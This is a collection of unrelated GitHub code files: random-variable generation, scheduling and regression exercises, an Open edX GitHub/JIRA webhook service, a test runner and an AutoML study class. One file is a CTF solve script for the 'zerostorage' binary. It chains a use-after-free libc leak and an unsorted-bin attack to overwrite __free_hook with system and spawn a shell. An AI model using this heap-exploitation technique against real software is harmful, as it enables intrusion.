b = alfa - math.log10(4)
q = alfa + (1 / alfa)
tetta = 4.5
d = 1 + math.log10(tetta)
length = min(len(firstRandomNumbers), len(secondRandomNumbers))
randomVariables = []
for i in range(0, length):
if len(randomVariables) == totalVariables:
break
z_i = (firstRandomNumbers[i] ** 2) * secondRandomNumbers[i]
v_i = a * math.log10(firstRandomNumbers[i] / (1 - secondRandomNumbers[i]))
y_i = alfa * CalcExp(v_i)
w_i = b + (q * v_i) - y_i
randomVariable = 0
if w_i + d - tetta * z_i > 0 or w_i >= math.log10(z_i):
randomVariable = betta * y_i
if randomVariable:
randomVariables.append(randomVariable)
return randomVariables
def DrawGraph(data):
plt.hist(data, 80)
plt.show()
| yaitox/RandomGenerator | src/Variables/randomVariable.py | randomVariable.py | py | 1,706 | python | en | code | 0 | github-code | 90 |
15296609506 | from pwn import *
# init
os.environ['LD_PRELOAD'] = '/home/dumbass/Desktop/Problem/zerostorage/libc-2.19.so'
r = process('./zerostorage')
e = ELF('./zerostorage')
libc = e.libc
context.arch = 'amd64'
#context.log_level = 'debug'
def insert(content):
r.sendlineafter('Your choice: ', '1')
r.sendlineafter('Length of new entry: ', str(len(content)))
r.sendafter('Enter your data: ', content)
def update(index, content):
r.sendlineafter('Your choice: ', '2')
r.sendlineafter('Entry ID: ', str(index))
r.sendlineafter('Length of entry: ', str(len(content)))
r.sendafter('Enter your data: ', content)
def merge(fromid, toid):
r.sendlineafter('Your choice: ', '3')
r.sendlineafter('Merge from Entry ID: ', str(fromid))
r.sendlineafter('Merge to Entry ID: ', str(toid))
def delete(index):
r.sendlineafter('Your choice: ', '4')
r.sendlineafter('Entry ID: ', str(index))
def view(index):
r.sendlineafter('Your choice: ', '5')
r.sendlineafter('Entry ID: ', str(index))
def list_c():
r.sendlineafter('Your choice: ', '6')
# create tow entries to enable merge
insert('/bin/sh\x00'+'A'*(0x1f0-8))
insert('A'*0x1f0)
# merge id1 itself to make id1 id2 point to the same addr
merge(1, 1)
# padding to avoid consolidation
insert('A'*0x1f0)
insert('A'*0x1f0)
# cause use after free and heap overflow then leak libc
delete(1)
view(2)
r.recvuntil('Entry No.2:\n')
sbin = u64(r.recv(6)+'\x00\x00')
libc_base = sbin - libc.symbols['__malloc_hook'] - 0x68
log.info('libc base: %#x' % libc_base)
system = libc_base + libc.symbols['system']
__malloc_hook = libc_base + libc.symbols['__malloc_hook']
__free_hook = libc_base + libc.symbols['__free_hook']
global_max_fast = __free_hook + 0x50
log.info('global_max_fast: %#x' % global_max_fast)
# overwrite global_max_fast by unsorted bin attack
insert('A'*0x1f0)
insert('A'*0x200)#padding
delete(3)
update(2, 'A'*0x1f0+p64(0)+p64(0x201)+p64(__malloc_hook+0x68)+p64(global_max_fast-0x10)+'A'*0x1d0)
insert('A'*0x1f0)
# exploit
delete(3)
update(2, 'A'*0x1f0+p64(0)+p64(0x201)+p64(__free_hook-0x50-9)+p64(0)+'A'*0x1d0)
insert('A'*0x1f0)
insert('\x00'*(0x50-7)+p64(system)+'\x00'*(0x198+7))
delete(0)
r.interactive()
| Kyle-Kyle/Pwn | heap_overflow/zerostorage_4.0/writeup/solve.py | solve.py | py | 2,204 | python | en | code | 16 | github-code | 90 |
28063249981 | # Joseph's problem
'''
in a closed circle of people, starting from an index, we kill people k places from them, then so on in a loop. Last man standing wins
TC.: O(n)
'''
def solve(index, arr, k):
if len(arr) == 1:
return arr
to_die = (index + k - 1) % len(arr)
print("to die", to_die, arr[to_die])
del arr[to_die]
solve(to_die, arr, k)
return arr
if __name__ == '__main__':
n = int(input())
arr = [i for i in range(n)]
print(arr)
k = int(input())
print(solve(0, arr, k)) | gowthamkishorem/DSA_GeeksforGeeks-Self-Placed- | DSA/001_Recursion/GFG/josephs.py | josephs.py | py | 547 | python | en | code | 0 | github-code | 90 |
6499580439 | n = int(input("Enter number of processes : "))
#p = [{"id":0, "arr":0, "burst":0}]
arrival = []
burst = []
finish = []
tat = []
wt = []
print()
print("Kindly enter the arrival time in ascending order\n")
for i in range(n):
val = int(input(f"Enter arrival time for P{i} : "))
arrival.append(val)
print()
for i in range(n):
val = int(input(f"Enter CPU burst time for P{i} : "))
burst.append(val)
t=0
for i in range(n):
t += burst[i]
finish.append(t)
for i in range(n):
t = finish[i] - arrival[i]
tat.append(t)
t = tat[i] - burst[i]
wt.append(t)
#for i in range(n):
print('\n')
print("processes \tarrival time \tburst time \tfinish time \tTAT \twaiting time")
for i in range(n):
print(f"P{i} \t\t{arrival[i]} \t\t{burst[i]} \t\t{finish[i]} \t\t{tat[i]} \t{wt[i]}")
avg_wt = sum(wt)
avg_wt = avg_wt/n
print(f"\nAverage waiting time = {avg_wt}")
5
0
2
5
8
12
18
5
3
7
4
3
0
0
0
24
3
3
| Nayan-das08/CPU-Scheduling | fcfs.py | fcfs.py | py | 939 | python | en | code | 0 | github-code | 90 |
20379727659 | import numpy as np
import matplotlib.pyplot as plt
def datagen(n, fun=None):
if fun == 'sin':
x = np.linspace(-10, 10, n)
else:
x = np.linspace(0, 5, n)
X_train = np.empty(0)
X_test = np.empty(0)
Y_train = np.empty(0)
Y_test = np.empty(0)
for i in range(n):
if fun == 'sin':
y = np.random.normal(np.sin(x[i])/x[i], 0.05)
else:
y = np.random.normal(2*x[i]+1, 0.2)
if i%3 == 0:
X_train = np.append(X_train, x[i])
Y_train = np.append(Y_train, y)
else:
X_test = np.append(X_test, x[i])
Y_test = np.append(Y_test, y)
return X_train, X_test, Y_train, Y_test
def theta_star(X_train, Y_train):
X_train = np.vstack((X_train, np.ones(X_train.shape[0])))
g = np.linalg.inv(np.dot(X_train, X_train.T))
return np.dot(np.dot(g, X_train), Y_train)
def polyreg(X_train, Y_train, p):
n = X_train.shape[0]
X = np.ones((p+1, n))
for i in range(n):
for j in range(p+1):
X[j, i] = np.power(X_train[i], p-j)
# return theta_star(X, Y_train)
g = np.linalg.inv(np.dot(X, X.T))
return np.dot(np.dot(g, X), Y_train)
def f(x, theta_star):
return np.vdot(theta_star, x)
# d = theta_star.shape[0]
# return np.sum([theta_star[j]*np.power(x, d-j-1) for j in range(d)])
def get_err_train(X_train, Y_train, p):
theta_star = polyreg(X_train, Y_train, p)
err = []
for i in range(X_train.shape[0]):
err.append(loss(X_train[i], Y_train[i], theta_star))
return np.sum(err)
#def get_err_train(X_train, Y_train):
# absc=np.arange(1,18)
# ords=[]
# for p in range(1,18):
# ords.append(err_train(X_train, Y_train, p))
# return absc,ords
#def loss(X,Y,p):
# theta_star=polyreg(X,Y,p)
# err=[]
# for i in range(len(X)):
# err.append(np.square(Y[i]-f(X[i],theta_star)))
# return np.squre()
def loss(x, y, theta):
return np.square(y - f(x, theta))
def aff_courbe(theta):
absc=np.arange(-10,10,0.1)
ords=np.zeros(len(absc))
for i in range(len(absc)):
ords[i]=f(absc[i], theta)
# ords[i]=np.sum([theta[p]*np.power(absc[i],len(theta)-p-1) for p in range(len(theta))])
plt.plot(absc,ords,'k-')
X_train, X_test, Y_train, Y_test = datagen(90)
plt.figure()
plt.plot(X_train, Y_train, '.r', X_test, Y_test, '.b')
theta_star = theta_star(X_train, Y_train)
#aff_courbe(theta_star)
plt.plot([theta_star[0]*x + theta_star[1] for x in range(6)], 'k')
X_train, X_test, Y_train, Y_test = datagen(90,fun='sin')
plt.figure()
plt.plot(X_train, Y_train, '.r', X_test, Y_test, '.b')
theta_star = polyreg(X_train, Y_train, 8)
aff_courbe(theta_star)
plt.figure()
absc = np.arange(1, 18)
train_ords = []
test_ords = []
for p in range(1, 18):
train_ords.append(get_err_train(X_train, Y_train, p))
#train_absc,train_ords=get_train_err(X_train,Y_train)
#test_absc,test_ords=get_train_err(X_test,Y_test)
plt.plot(absc, train_ords, 'g-')
theta_star = polyreg(X_train, Y_train, 19)
plt.figure()
plt.plot(X_train, Y_train, '.r')
aff_courbe(theta_star)
| iver62/A2DI | tp3/tp3_ex2.py | tp3_ex2.py | py | 3,132 | python | en | code | 0 | github-code | 90 |
18115667639 | import sys
input = sys.stdin.readline
if __name__ == '__main__':
n = int(input())
A = list(map(int, input().split()))
cnt = 0
def merge(A, left, mid, right):
global cnt
n1 = mid - left
n2 = right - mid
L=[10**9+1]*(n1+1) # 先に入れきった方の配列をヌルポにしないため
R=[10**9+1]*(n2+1)
for i in range(n1):
L[i] = A[left + i]
for i in range(n2):
R[i] = A[mid + i]
i = 0
j = 0
for k in range(left, right):
cnt += 1
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
def mergeSort(A, left, right):
if left + 1 < right:
mid = (left + right) // 2
mergeSort(A, left, mid)
mergeSort(A, mid, right)
merge(A, left, mid, right)
mergeSort(A, 0, n)
print(*A)
print(cnt)
| Aasthaengg/IBMdataset | Python_codes/p02272/s731883096.py | s731883096.py | py | 840 | python | en | code | 0 | github-code | 90 |
1518682291 | from __future__ import unicode_literals, print_function
import sys
import json
import re
import bugsnag
import requests
import yaml
from flask import request, render_template, make_response, url_for
from flask_dance.contrib.github import github
from flask_dance.contrib.jira import jira
from openedx_webhooks import app
from openedx_webhooks.utils import memoize, paginated_get
from openedx_webhooks.views.jira import get_jira_custom_fields
@app.route("/github/pr", methods=("POST",))
def github_pull_request():
try:
event = request.get_json()
except ValueError:
raise ValueError("Invalid JSON from Github: {data}".format(data=request.data))
bugsnag_context = {"event": event}
bugsnag.configure_request(meta_data=bugsnag_context)
if "pull_request" not in event and "hook" in event and "zen" in event:
# this is a ping
repo = event.get("repository", {}).get("full_name")
print("ping from {repo}".format(repo=repo), file=sys.stderr)
return "PONG"
pr = event["pull_request"]
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
if event["action"] == "opened":
return pr_opened(pr, bugsnag_context)
if event["action"] == "closed":
return pr_closed(pr, bugsnag_context)
if event["action"] == "labeled":
return "Ignoring labeling events from github", 200
print(
"Received {action} event on PR #{num} against {repo}, don't know how to handle it".format(
action=event["action"],
repo=pr["base"]["repo"]["full_name"].decode('utf-8'),
num=pr["number"],
),
file=sys.stderr
)
return "Don't know how to handle this.", 400
@app.route("/github/rescan", methods=("GET", "POST"))
def github_rescan():
"""
Used to pick up PRs that might not have tickets associated with them.
"""
if request.method == "GET":
# just render the form
return render_template("github_rescan.html")
repo = request.form.get("repo") or "edx/edx-platform"
bugsnag_context = {"repo": repo}
bugsnag.configure_request(meta_data=bugsnag_context)
url = "/repos/{repo}/pulls".format(repo=repo)
created = {}
for pull_request in paginated_get(url, session=github):
bugsnag_context["pull_request"] = pull_request
bugsnag.configure_request(meta_data=bugsnag_context)
if not get_jira_issue_key(pull_request) and not is_edx_pull_request(pull_request):
text = pr_opened(pull_request, bugsnag_context=bugsnag_context)
if "created" in text:
jira_key = text[8:]
created[pull_request["number"]] = jira_key
print(
"Created {num} JIRA issues. PRs are {prs}".format(
num=len(created), prs=created.keys(),
),
file=sys.stderr
)
resp = make_response(json.dumps(created), 200)
resp.headers["Content-Type"] = "application/json"
return resp
@app.route("/github/install", methods=("GET", "POST"))
def github_install():
if request.method == "GET":
return render_template("install.html")
repo = request.form.get("repo", "")
if repo:
repos = (repo,)
else:
repos = get_repos_file().keys()
secure = request.is_secure or request.headers.get("X-Forwarded-Proto", "http") == "https"
api_url = url_for(
"github_pull_request", _external=True,
_scheme="https" if secure else "http",
)
success = []
failed = []
for repo in repos:
url = "/repos/{repo}/hooks".format(repo=repo)
body = {
"name": "web",
"events": ["pull_request"],
"config": {
"url": api_url,
"content_type": "json",
}
}
bugsnag_context = {"repo": repo, "body": body}
bugsnag.configure_request(meta_data=bugsnag_context)
hook_resp = github.post(url, json=body)
if hook_resp.ok:
success.append(repo)
else:
failed.append((repo, hook_resp.text))
if failed:
resp = make_response(json.dumps(failed), 502)
else:
resp = make_response(json.dumps(success), 200)
resp.headers["Content-Type"] = "application/json"
return resp
@memoize
def github_whoami():
self_resp = github.get("/user")
rate_limit_info = {k: v for k, v in self_resp.headers.items() if "ratelimit" in k}
print("Rate limits: {}".format(rate_limit_info), file=sys.stderr)
if not self_resp.ok:
raise requests.exceptions.RequestException(self_resp.text)
return self_resp.json()
@memoize
def get_people_file():
people_resp = requests.get("https://raw.githubusercontent.com/edx/repo-tools/master/people.yaml")
if not people_resp.ok:
raise requests.exceptions.RequestException(people_resp.text)
return yaml.safe_load(people_resp.text)
@memoize
def get_repos_file():
repo_resp = requests.get("https://raw.githubusercontent.com/edx/repo-tools/master/repos.yaml")
if not repo_resp.ok:
raise requests.exceptions.RequestException(repo_resp.text)
return yaml.safe_load(repo_resp.text)
def is_edx_pull_request(pull_request):
"""
Was this pull request created by someone who works for edX?
"""
people = get_people_file()
author = pull_request["user"]["login"].decode('utf-8')
return (author in people and
people[author].get("institution", "") == "edX")
def pr_opened(pr, bugsnag_context=None):
bugsnag_context = bugsnag_context or {}
user = pr["user"]["login"].decode('utf-8')
if is_edx_pull_request(pr):
# not an open source pull request, don't create an issue for it
print(
"@{user} opened PR #{num} against {repo} (internal PR)".format(
user=user, repo=pr["base"]["repo"]["full_name"],
num=pr["number"]
),
file=sys.stderr
)
return "internal pull request"
issue_key = get_jira_issue_key(pr)
if issue_key:
msg = "Already created {key} for PR #{num} against {repo}".format(
key=issue_key,
num=pr["number"],
repo=pr["base"]["repo"]["full_name"],
)
print(msg, file=sys.stderr)
return msg
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
people = get_people_file()
custom_fields = get_jira_custom_fields()
if user in people:
user_name = people[user].get("name", "")
else:
user_resp = github.get(pr["user"]["url"])
if user_resp.ok:
user_name = user_resp.json().get("name", user)
else:
user_name = user
# create an issue on JIRA!
new_issue = {
"fields": {
"project": {
"key": "OSPR",
},
"issuetype": {
"name": "Pull Request Review",
},
"summary": pr["title"],
"description": pr["body"],
custom_fields["URL"]: pr["html_url"],
custom_fields["PR Number"]: pr["number"],
custom_fields["Repo"]: pr["base"]["repo"]["full_name"],
custom_fields["Contributor Name"]: user_name,
}
}
institution = people.get(user, {}).get("institution", None)
if institution:
new_issue["fields"][custom_fields["Customer"]] = [institution]
bugsnag_context["new_issue"] = new_issue
bugsnag.configure_request(meta_data=bugsnag_context)
resp = jira.post("/rest/api/2/issue", json=new_issue)
if not resp.ok:
raise requests.exceptions.RequestException(resp.text)
new_issue_body = resp.json()
issue_key = new_issue_body["key"].decode('utf-8')
bugsnag_context["new_issue"]["key"] = issue_key
bugsnag.configure_request(meta_data=bugsnag_context)
# add a comment to the Github pull request with a link to the JIRA issue
comment = {
"body": github_pr_comment(pr, new_issue_body, people),
}
url = "/repos/{repo}/issues/{num}/comments".format(
repo=repo, num=pr["number"],
)
comment_resp = github.post(url, json=comment)
if not comment_resp.ok:
raise requests.exceptions.RequestException(comment_resp.text)
issue_url = "/repos/{repo}/issues/{num}".format(repo=repo, num=pr["number"])
label_resp = github.patch(issue_url, data=json.dumps({"labels": ["needs triage"]}))
if not label_resp.ok:
raise requests.exceptions.RequestException(label_resp.text)
print(
"@{user} opened PR #{num} against {repo}, created {issue} to track it".format(
user=user, repo=repo,
num=pr["number"], issue=issue_key,
),
file=sys.stderr
)
return "created {key}".format(key=issue_key)
def pr_closed(pr, bugsnag_context=None):
bugsnag_context = bugsnag_context or {}
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
merged = pr["merged"]
issue_key = get_jira_issue_key(pr)
if not issue_key:
print(
"Couldn't find JIRA issue for PR #{num} against {repo}".format(
num=pr["number"], repo=repo,
),
file=sys.stderr
)
return "no JIRA issue :("
bugsnag_context["jira_key"] = issue_key
bugsnag.configure_request(meta_data=bugsnag_context)
# close the issue on JIRA
transition_url = (
"/rest/api/2/issue/{key}/transitions"
"?expand=transitions.fields".format(key=issue_key)
)
transitions_resp = jira.get(transition_url)
if not transitions_resp.ok:
raise requests.exceptions.RequestException(transitions_resp.text)
transitions = transitions_resp.json()["transitions"]
bugsnag_context["transitions"] = transitions
bugsnag.configure_request(meta_data=bugsnag_context)
transition_name = "Merged" if merged else "Rejected"
transition_id = None
for t in transitions:
if t["to"]["name"] == transition_name:
transition_id = t["id"]
break
if not transition_id:
# maybe the issue is *already* in the right status?
issue_url = "/rest/api/2/issue/{key}".format(key=issue_key)
issue_resp = jira.get(issue_url)
if not issue_resp.ok:
raise requests.exceptions.RequestException(issue_resp.text)
issue = issue_resp.json()
bugsnag_context["jira_issue"] = issue
bugsnag.configure_request(meta_data=bugsnag_context)
current_status = issue["fields"]["status"]["name"].decode("utf-8")
if current_status == transition_name:
msg = "{key} is already in status {status}".format(
key=issue_key, status=transition_name
)
print(msg, file=sys.stderr)
return "nothing to do!"
# nope, raise an error message
fail_msg = (
"{key} cannot be transitioned directly from status {curr_status} "
"to status {new_status}. Valid status transitions are: {valid}".format(
key=issue_key, new_status=transition_name,
curr_status=current_status,
valid=", ".join(t["to"]["name"].decode('utf-8') for t in transitions),
)
)
raise Exception(fail_msg)
transition_resp = jira.post(transition_url, json={
"transition": {
"id": transition_id,
}
})
if not transition_resp.ok:
raise requests.exceptions.RequestException(transition_resp.text)
print(
"PR #{num} against {repo} was {action}, moving {issue} to status {status}".format(
num=pr["number"], repo=repo, action="merged" if merged else "closed",
issue=issue_key, status="Merged" if merged else "Rejected",
),
file=sys.stderr
)
return "closed!"
def get_jira_issue_key(pull_request):
me = github_whoami()
my_username = me["login"]
comment_url = "/repos/{repo}/issues/{num}/comments".format(
repo=pull_request["base"]["repo"]["full_name"].decode('utf-8'),
num=pull_request["number"],
)
for comment in paginated_get(comment_url, session=github):
# I only care about comments I made
if comment["user"]["login"] != my_username:
continue
# search for the first occurrance of a JIRA ticket key in the comment body
match = re.search(r"\b([A-Z]{2,}-\d+)\b", comment["body"])
if match:
return match.group(0).decode('utf-8')
return None
def github_pr_comment(pull_request, jira_issue, people=None):
"""
For a newly-created pull request from an open source contributor,
write a welcoming comment on the pull request. The comment should:
* contain a link to the JIRA issue
* check for contributor agreement
* check for AUTHORS entry
* contain a link to our process documentation
"""
people = people or get_people_file()
people = {user.lower(): values for user, values in people.items()}
pr_author = pull_request["user"]["login"].decode('utf-8').lower()
# does the user have a signed contributor agreement?
has_signed_agreement = pr_author in people
# is the user in the AUTHORS file?
in_authors_file = False
name = people.get(pr_author, {}).get("name", "")
institution = people.get(pr_author, {}).get("institution", None)
if name:
authors_url = "https://raw.githubusercontent.com/{repo}/{branch}/AUTHORS".format(
repo=pull_request["head"]["repo"]["full_name"].decode('utf-8'),
branch=pull_request["head"]["ref"].decode('utf-8'),
)
authors_resp = github.get(authors_url)
if authors_resp.ok:
authors_content = authors_resp.text
if name in authors_content:
in_authors_file = True
doc_url = "http://edx.readthedocs.org/projects/userdocs/en/latest/process/overview.html"
issue_key = jira_issue["key"].decode('utf-8')
issue_url = "https://openedx.atlassian.net/browse/{key}".format(key=issue_key)
contributing_url = "https://github.com/edx/edx-platform/blob/master/CONTRIBUTING.rst"
agreement_url = "http://code.edx.org/individual-contributor-agreement.pdf"
authors_url = "https://github.com/{repo}/blob/master/AUTHORS".format(
repo=pull_request["base"]["repo"]["full_name"].decode('utf-8'),
)
comment = (
"Thanks for the pull request, @{user}! I've created "
"[{issue_key}]({issue_url}) to keep track of it in JIRA. "
"JIRA is a place for product owners to prioritize feature reviews "
"by the engineering development teams. "
"\n\nFeel free to add as much of the following information to the ticket:"
"\n- supporting documentation"
"\n- edx-code email threads"
"\n- timeline information ('this must be merged by XX date', and why that is)"
"\n- partner information ('this is a course on edx.org')"
"\n- any other information that can help Product understand the context for the PR"
"\n\nAll technical communication about the code itself will still be "
"done via the Github pull request interface. "
"As a reminder, [our process documentation is here]({doc_url})."
).format(
user=pull_request["user"]["login"].decode('utf-8'),
issue_key=issue_key, issue_url=issue_url, doc_url=doc_url,
)
if not has_signed_agreement or not in_authors_file:
todo = ""
if not has_signed_agreement:
todo += (
"submitted a [signed contributor agreement]({agreement_url}) "
"or indicated your institutional affiliation"
).format(
agreement_url=agreement_url,
)
if not has_signed_agreement and not in_authors_file:
todo += " and "
if not in_authors_file:
todo += "added yourself to the [AUTHORS]({authors_url}) file".format(
authors_url=authors_url,
)
comment += ("\n\n"
"We can't start reviewing your pull request until you've {todo}. "
"Please see the [CONTRIBUTING]({contributing_url}) file for "
"more information."
).format(todo=todo, contributing_url=contributing_url)
return comment
| lduarte1991/openedx-webhooks | openedx_webhooks/views/github.py | github.py | py | 16,291 | python | en | code | null | github-code | 90 |
1263342108 | """Tests execution of all module examples.
Tests should run as fast as possible to enable fast feedback during code
development. This test script aims to only test the execution of examples
e.g. to check for runtime errors if the module's api was changed,
but the exmaple has not yet been updated accordingly.
The directory of each example and the name of the example script to test needs
to be added to the example_list global variable.
No two examples can have the same script name. Note that if a test fails, then
the data structures, e.g. OpenCMISS objects, may not be finalised. Subsequent
tests may fail if they use the same data structures. it is therefore important
to address any test issues in numerical order. To address this issue, proper
cleanup of data structures, e.g. through a callback, is required whenever
an arbitrary error is encountered. This has not yet been implemented in the
module.
Authors: Thiranja Prasad Babarenda Gamage
Organisation: Auckland Bioengineering Institute, University of Auckland
"""
import os
import sys
import json
import unittest
from parameterized import parameterized
# Ignore tensorflow FutureWarning messages.
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=FutureWarning)
import tensorflow
# Load in the metadata for the stf dataset that will be used for testing.
config_file_path = '../../study_configurations/stf.config'
with open(config_file_path) as config_file:
cfg = json.load(config_file)
config_file.close()
example_root_directory = os.path.abspath('../../examples')
# List of examples to test [example directory, example name].
# Note that some of these examples need to be run in order (e.g. output from
# 'machine_learning_mechanics/configuration_generator/' is required for most
# of the subsequent machine learning mechanics examples.
example_list = [
['confidence_intervals/', 'confidence_intervals']
]
# Postprocessing of example_list to address peculiarities in parameterized
# python module.
# "parameterized" module uses the first array value in the example_list as the
# test name. Reverse order of example directory and example name to allow the
# example name to be used as the test name.
example_list = [example[::-1] for example in example_list[::-1]]
# "parameterized" module runs through tests in reverse order. Reverse order of
# example list such that the examples run in the order as listed in the
# example list above.
example_list = example_list[::-1]
class TestExampleExecution(unittest.TestCase):
"""Class for testing execution of all examples in the example list.
Note that each example needs to have a main() function. To achieve
efficient testing, a test=True input argument is passed to the main()
function. The user can use this to bypass time consuming tasks e.g. for
mechanics, it can be used to skip the mechanics solves and quickly test the
infrastructure. Other tests are necessary to verify/validate that the
mechanics output is correct e.g. comparisons to expected output/analytic
solutions.
"""
@parameterized.expand(example_list)
def test(self, example_name, example_dir):
"""Test execution of the specified heart_mech example script.
The examples are run in their original directories. They have been
configured to export any output to 'results_test' folder in their
original directories.
Args:
example_name: Name of example to be tested.
example_dir: Directory name for the example.
"""
os.chdir(os.path.join(example_root_directory, example_dir))
# Add example directory (now the current working directory) to python
# sys path.
sys.path.insert(0, './')
# Import example script.
example = __import__(example_name)
# Execute example.
example.main(cfg, test=True)
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| PrasadBabarendaGamage/parameter-estimation | tests/example_execution/execute_all_examples.py | execute_all_examples.py | py | 4,000 | python | en | code | 1 | github-code | 90 |
18236486296 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
diego/study.py was created on 2019/03/21.
file in :relativeFile
Author: Charles_Lai
Email: lai.bluejay@gmail.com
"""
from typing import Union
from typing import Type
from typing import Tuple
from typing import Set
from typing import Optional
from typing import List
from typing import Dict
from typing import Callable
from typing import Any
import os
from collections import defaultdict
import numpy as np
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.utils import validation
import joblib
import six
from diego.depens import logging
from diego.preprocessor import AutobinningTransform, LocalUncertaintySampling
from diego.trials import Trial
from diego import trials as trial_module
from diego import basic
from diego.core import Storage, generate_uuid
from diego import metrics as diego_metrics
from diego.ensemble_net import Ensemble, EnsembleStack, EnsembleStackClassifier, Combiner
from diego.classifier import LogisticRegressionSK, LogisticRegressionSMAC
import collections
import datetime
import math
import multiprocessing
import multiprocessing.pool
from multiprocessing import Queue
import pandas as pd
from six.moves import queue
import time
from sklearn.utils import check_X_y
from autosklearn.classification import AutoSklearnClassifier
from autosklearn.pipeline.components import classification
import gc
gc.enable()
classification.add_classifier(LogisticRegressionSK)
classification.add_classifier(LogisticRegressionSMAC)
ObjectiveFuncType = Callable[[trial_module.Trial], float]
def _name_estimators(estimators):
"""Generate names for estimators."""
names = [type(estimator).__name__.lower() for estimator in estimators]
namecount = defaultdict(int)
for est, name in zip(estimators, names):
namecount[name] += 1
for k, v in list(six.iteritems(namecount)):
if v == 1:
del namecount[k]
for i in reversed(range(len(estimators))):
name = names[i]
if name in namecount:
names[i] += "-%d" % namecount[name]
namecount[name] -= 1
return list(zip(names, estimators))
class Study(object):
"""
reference diego
A study corresponds to an optimization task, i.e., a set of trials.
Note that the direct use of this constructor is not recommended.
This object provides interfaces to run a new , access trials'
history, set/get user-defined attributes of the study itself.
Args:
study_name:
Study's name. Each study has a unique name as an identifier.
storage:
"""
def __init__(
self,
study_name, # type: str
storage, # type: Union[str, storages.BaseStorage]
sample_method=None,
sample_params=dict(),
is_autobin=False,
bin_params=dict(),
metrics: str ='logloss',
export_model_path=None,
precision=np.float64,
):
"""[summary]
Arguments:
study_name {[type]} -- [description]
Keyword Arguments:
sample_params {[type]} -- [description] (default: {dict()})
is_autobin {bool} -- [description] (default: {False})
bin_params {[type]} -- [description] (default: {dict()})
export_model_path {[type]} -- [description] (default: {None})
precision {[np.dtype]} -- precision:
np.dtypes, float16, float32, float64 for data precision to reduce memory size. (default: {None})
"""
self.study_name = study_name
self.storage = get_storage(storage)
self.sample_method = sample_method
if sample_method == 'lus':
self.sampler = LocalUncertaintySampling(**sample_params)
else:
self.sampler = None
self.is_autobin = is_autobin
if self.is_autobin:
if len(bin_params) > 1:
self.bin_params = bin_params
else:
self.bin_params = dict()
self.bin_params['binning_method'] = 'xgb'
self.binner = AutobinningTransform(**self.bin_params)
# uuid4+time.time(), uuid5
self.study_id = self.storage.get_study_id_from_name(study_name)
self.logger = logging.get_logger(__name__)
self.trial_list = []
# export model. should be joblib.Memory object
self.pipeline = None
self.export_model_path = export_model_path
self.precision = precision
self.stack = EnsembleStack()
self.layer = list()
self.ensemble = None
self.metrics = metrics
# opt_est = ['gaussian_nb','random_forest', 'sgd', 'xgradient_boosting'] + [t for t in classification._addons.components]
opt_est = ['gaussian_nb','random_forest', 'sgd'] + [t for t in classification._addons.components]
hint = """
You can generate trial by study.generate_trial(mode='fast').
The option of trial estimator is recomended: {}
""".format(str(opt_est))
self.logger.warn(hint)
def __getstate__(self):
# type: () -> Dict[Any, Any]
state = self.__dict__.copy()
del state['logger']
return state
def __setstate__(self, state):
# type: (Dict[Any, Any]) -> None
self.__dict__.update(state)
self.logger = logging.get_logger(__name__)
def __init_bin_params(self,):
params = dict()
params['binning_method'] = 'xgb'
params['binning_value_type'] = 'woe'
@property
def best_value(self):
# type: () -> float
"""Return the best objective value in the :class:`~diego.study.Study`.
Returns:
A float representing the best objective value.
"""
best_value = self.best_trial.value
if best_value is None:
raise ValueError('No trials are completed yet.')
return best_value
@property
def best_trial(self):
# type: () -> basic.FrozenTrial
"""Return the best trial in the :class:`~diego.study.Study`.
Returns:
"""
bt = self.storage.get_best_trial(self.study_id)
return bt
@property
def all_trials(self):
return self.storage.get_all_trials(self.study_id)
@property
def direction(self):
# type: () -> basic.StudyDirection
"""Return the direction of the :class:`~diego.study.Study`.
Returns:
"""
return self.storage.get_study_direction(self.study_id)
@property
def trials(self):
# type: () -> List[basic.FrozenTrial]
"""Return all trials in the :class:`~diego.study.Study`.
Returns:
"""
return self.storage.get_all_trials(self.study_id)
@property
def user_attrs(self):
# type: () -> Dict[str, Any]
"""Return user attributes.
Returns:
A dictionary containing all user attributes.
"""
return self.storage.get_study_user_attrs(self.study_id)
@property
def system_attrs(self):
# type: () -> Dict[str, Any]
"""Return system attributes.
Returns:
A dictionary containing all system attributes.
"""
return self.storage.get_study_system_attrs(self.study_id)
def optimize(
self, X_test, y_test,
timeout=None, # type: Optional[float]
n_jobs=-1, # type: int
# type: Union[Tuple[()], Tuple[Type[Exception]]]
catch=(Exception, ),
precision=None,
):
# type: (...) -> None
"""Optimize an objective function.
Args:
func:
A callable that implements objective function.
n_jobs:
default = 1; jobs to run trials.
timeout:
Stop study after the given number of second(s). If this argument is set to
:obj:`None`, the study is executed without time limitation. If :obj:`n_trials` is
also set to :obj:`None`, the study continues to create trials until it receives a
termination signal such as Ctrl+C or SIGTERM.
metrics:
metrics to optimize study.
catch:
A study continues to run even when a trial raises one of exceptions specified in
this argument. Default is (`Exception <https://docs.python.org/3/library/
exceptions.html#Exception>`_,), where all non-exit exceptions are handled
by this logic.
"""
X_test, y_test = check_X_y(X_test, y_test)
if not precision:
X_test = X_test.astype(dtype=self.precision, copy=False)
self.storage.set_test_storage(X_test, y_test)
del X_test
del y_test
gc.collect()
# TODO Preprocess Trial
if self.sample_method == 'lus':
self.logger.info('Sampling training dataset with lus. Origin data shape is {0}'.format(
str(self.storage.X_train.shape)))
# X_train, y_train = self.storage.X_train, self.storage.y_train
self.storage.X_train, self.storage.y_train = self.sampler.fit_transform(self.storage.X_train, self.storage.y_train)
self.logger.info(
'Sampling is done. Sampled data shape is {0}'.format(str(self.storage.X_train.shape)))
# self.storage.set_train_storage(X_train, y_train)
if self.is_autobin:
self.logger.info("begin to autobinning data by {} with method {}".format(
type(self.binner), self.binner.binning_method))
self.binner.fit(self.storage.X_train, self.storage.y_train)
self.storage.X_train = self.binner.transform(self.storage.X_train)
self.storage.X_test = self.binner.transform(self.storage.X_test)
# self.storage.set_train_storage(X_train, self.storage.y_train)
# self.storage.set_test_storage(X_test, y_test)
self.logger.warning(
'Binning is done. Binning would transform test_data to new bin.')
self._pipe_add(self.binner)
n_jobs = basic.get_approp_n_jobs(n_jobs)
y = np.copy(self.storage.y_train)
